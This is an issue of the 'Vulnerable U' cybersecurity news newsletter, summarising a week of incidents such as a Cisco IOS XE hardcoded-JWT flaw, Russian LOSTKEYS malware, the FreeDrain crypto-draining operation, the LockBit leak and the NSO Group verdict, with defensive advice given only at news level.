🎓️ Vulnerable U | #115

Massive Cisco 0day, New Russian malware intel, 38,000 domains ID'd in crypto draining operation, NSO spyware hit with massive fine, and much more!

Read Time: 9 minutes

Brought to you by:

Howdy friends!

This week has been a series of the Monday’est Monday’s ever one after the other. It was like drinking that cup of water and all the ice is stuck to the bottom. RSA happened. All the ice fell on my face.

I’m a bit stressed, a little sick from travel, and just battery completely drained from the marathon that is RSA week. 8am until ~10pm was booked solid everyday. And I’ll do it all over again next year.

Thank you to DomainTools for hooking me up with some dedicated space to take meetings and hide/eat. Not even a sponsor, just gave back to me and a few other creators because they’re awesome.

ICYMI

🖊️ Something I wrote: lol, it finally happened and I sent last week’s newsletter with my “Link” placeholder here. Sorry! I was flying back from SF and just missed it. Thanks for those of you who pointed it out, appreciate keeping me honest! - Now for this week: TeleMessage, the company behind the modified Signal client used by Trump admin officials, has been breached.

🎧️ Something I heard: Daniel Miessler and Jason Haddix - Reviewing RSA 2025

🎤 Something I said: Report: Identity is the new Malware

🔖 Something I read: Chris Krebs recap of his experience at RSA, days after he was targetted by the current US administration.

Vulnerable News

Well this is concerning. CISA and friends (FBI, EPA, DOE) just dropped an advisory about a new trend they're seeing - cybercriminals and other "lower-level" threat actors are increasingly targeting operational technology networks. Traditionally, OT (Operational Technology) and critical infrastructure were the playground of sophisticated nation-state hackers, but now the barrier to entry seems to be dropping. The culprit is good old fashioned poor security hygiene - default passwords, internet-exposed systems, and those difficult-to-patch industrial devices.

The advisory specifically calls out attacks against oil and natural gas sectors, noting that while these intrusions often use "basic and elementary techniques," they can still cause serious damage including operational disruptions and even physical damage. The advice is pretty straightforward: get your OT devices off the internet, change those default passwords, air-gap your networks where possible, and lock down remote access. Simple stuff in theory, but we all know how challenging OT security can be in practice. (read more)

For Voice of Security 2025, sponsored by Tines and AWS, IDC surveyed security leaders in the US, Europe, and Australia.

The research uncovered that 72% of respondents saw increased workloads last year, yet, 58% consider their teams "properly staffed.” Where’s the disconnect? And what other challenges are leaders facing this year? Read the full white paper to hear more on:

  • AI adoption progress and top use cases

  • How teams are performing against key metrics

  • Tool stack strengths and weaknesses

  • The skills analysts need to succeed

*Sponsored

Day that ends in Y. Cisco released a patch for a nasty JWT vulnerability in IOS XE Wireless Controllers that scores a perfect 10.0 CVSS. The bug (CVE-2025-20188) lets remote attackers upload arbitrary files and execute root commands, all thanks to a hardcoded JWT. The attack vector requires the Out-of-Band AP Image Download feature to be enabled. It’s off by default, but if you’ve turned it on, you’ll want to patch ASAP, and probably spin up an incident.

The vulnerability impacts several Catalyst 9800 series controllers and embedded wireless solutions. Cisco’s internal team caught this one before it was exploited in the wild, but the potential impact is severe. If you can’t patch immediately, disable the Out-of-Band AP Image Download feature. Your APs will fall back to CAPWAP for updates without affecting client connections. (Read more)

Google’s Threat Intelligence team caught COLDRIVER (aka Star Blizzard) using a new malware called LOSTKEYS that’s specifically targeting Western government advisors, journalists, and NGOs. The malware uses a social-engineering trick we’ve been seeing more and more lately, a fake CAPTCHA page that tricks users into copying and pasting PowerShell commands. After some VM-evading checks, it deploys the final payload that steals files and system info.

This ties back to a December 2023 campaign where similar malware was disguised as Maltego software packages. The group, backed by Russia, has evolved from their credential-phishing playbook (SPICA in 2024) to more targeted document theft. They’re still after intelligence, but with a new level of sophistication against high-value Western targets. (Read more)

A massive crypto-draining operation called FreeDrain has been using industrial-scale SEO manipulation to steal wallet seed phrases. The attackers set up 38,000+ subdomains on legitimate platforms like gitbook.io and github.io, targeting users searching for wallet-related queries. When users land on these convincing phishing pages (complete with AI-generated content), they’re prompted to enter their seed phrase, and their funds are drained within minutes.

The operation appears to be run by a group working standard business hours in the IST timezone, suggesting this is literally their day job. This ties into another recent discovery about Inferno Drainer, a DaaS tool that’s stolen about $9 M from 30k+ wallets despite claiming to shut down last November. Both are part of a broader trend of crypto-draining operations becoming more sophisticated, using legitimate services and advanced evasion techniques that make them particularly resilient to takedowns. (Read more)

LockBit just got a taste of their own medicine as their dark web affiliate panels were hacked and defaced with a cheeky message: "Don't do crime CRIME IS BAD xoxo from Prague." The attackers dumped LockBit's MySQL database, revealing a treasure trove of goodies including nearly 60K bitcoin addresses, build configurations, and most juicily, over 4,400 negotiation messages between the gang and their victims. They even exposed 75 admin/affiliate accounts with hilariously bad plaintext passwords like "Weekendlover69" and "LockbitProud231."

This couldn't come at a worse time for LockBit, who were still licking their wounds from Operation Cronos last year when law enforcement took down their infrastructure. Interestingly, the defacement message matches one used in a recent Everest ransomware breach, suggesting the same actor may be targeting multiple ransomware operations. (read more)

Europol’s latest PowerOFF operation just took down six more DDoS-for-hire platforms and nabbed four suspects in Poland. The targeted services (Cfxapi, Cfxsecurity, Neostress, Jetstress, Quickdown, and Zapcut) were being used to hit gaming platforms, businesses, government orgs, and schools between 2022–2025. This was a joint effort between Poland, the Netherlands, the US, and German authorities, with the Dutch setting up honeypot booter services to warn potential customers about consequences. The US also killed nine associated domains, while Dutch intel from seized booter sites helped Polish authorities make their arrests.

This continues the steady drumbeat of law-enforcement actions against DDoS-for-hire services we’ve seen lately, following the takedowns of DigitalStress and Anonymous Sudan’s infrastructure. These services had been offering DDoS attacks for just a few dollars, making large-scale attacks accessible to basically anyone with pocket change. (Read more)

Insight Partners, the $90 B VC firm behind Twitter and HelloFresh, just confirmed they got hit with a social-engineering attack that led to data theft. The January breach exposed sensitive info including fund details, banking data, and personal information of employees and limited partners. While they contained it to a single day, the full scope is still being investigated.

No ransomware groups have claimed credit yet, which makes this one interesting. Could be someone sitting on the data for leverage, or a targeted theft of specific investment intel. Either way, Insight’s doing the usual mitigation dance: password changes, 2FA, and credit monitoring for those affected. (Read more)

Hey remember when I said I was baffled about how this forked version of Signal that broke e2e, TeleMessage, got through government or big bank procurement/security review. Turns out I was right to be baffled, a number of unnamed government agencies denied TeleMessage usage after it failed the most basic of pressing on security questions.

Mandiant just dropped a detailed breakdown of UNC3944 (aka Scattered Spider) with some interesting insights into their latest tactics. They started with SIM-swapping telcos but pivoted to ransomware/extortion in 2023, hitting financial services in late 2023 and food services in May 2024. While their activity dipped after arrests in 2024, they’ve potentially bounced back through DragonForce ransomware, recently targeting UK retail.

The report’s meat is in their attack pattern: heavy social engineering (impersonating IT help desks), credential theft, and MFA bypass. Defense recommendations focus on identity hardening, strict verification for password/MFA changes, eliminating SMS auth, and isolating admin accounts. Endpoint controls and network segmentation, especially around management tools and backup infrastructure, are also key. These aren’t script kiddies. They’re a very persistent group that keeps adapting despite law-enforcement pressure. (Read more)

Iranian threat actors have set up a near-perfect clone of a German modeling agency’s website. The fake site runs obfuscated JavaScript to fingerprint visitors (collecting browser details, IP addresses, and device info) likely to identify specific targets. They even injected a fictitious model profile for “Shir Benzion” with a non-functional private album link, probably setting up a targeted phishing campaign.

The infrastructure and tactics point to Agent Serpens (aka APT35/Charming Kitten), known for targeting Iranian dissidents and activists abroad. While no direct victim interaction has been observed yet, the sophistication of the visitor-profiling and site impersonation suggests this is just the setup phase of a larger espionage operation. (Read more)

NSO Group just took a $167 million punch to the face. A jury ruled the spyware maker has to pay WhatsApp this dumptruck of money (plus about $445K in compensatory damages) for their 2019 hacking campaign that targeted over 1,400 users including journalists, activists, and dissidents. This caps a five-year legal saga where WhatsApp accused NSO of exploiting an audio-calling vulnerability to deploy their Pegasus spyware.

The verdict is the first major legal victory against the commercial spyware industry. Last December, a judge already determined NSO violated both federal and California hacking laws, so this trial was just to determine the price tag. NSO is making noise about appealing, but this is undeniably a massive blow to their business. As researcher John Scott-Railton put it, "NSO makes many millions of dollars helping dictators hack people... it only took the jury a day's deliberation to see right through to the heart of the matter." Not a great day to be in the dictator-helping business. (read more)

Lampion malware is back targeting Portuguese organizations with a new twist, they’ve adopted the ClickFix social-engineering technique that’s been making rounds lately. The campaign hits government, finance, and transportation sectors with a complex infection chain starting from phishing emails. They built a multi-stage attack using heavily obfuscated VB scripts (we’re talking 30–50 MB of bloated code) and some clever scheduled-task tricks to evade detection.

It starts with a zip file leading to a fake Portuguese tax website where victims are tricked into running PowerShell commands to “fix” supposed computer issues. From there, it’s a sequence of VBS stages, with the final payload mysteriously commented out in the code. Most notable is their massive 700 MB DLL loader which is clearly designed to be too big for malware-scanning sites to handle. (Read more)

Miscellaneous mattjay

The new pope is from Chicago and the memes are tickling just the right part of my brain

How'd I do this edition?

It's hard doing this in a vacuum. Screaming into a void. Feedback is incredibly valuable to make sure I'm making a newsletter you love getting every week.

Login or Subscribe to participate in polls.

Parting Thoughts:

Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.

Stay safe, Matt Johansen
@mattjay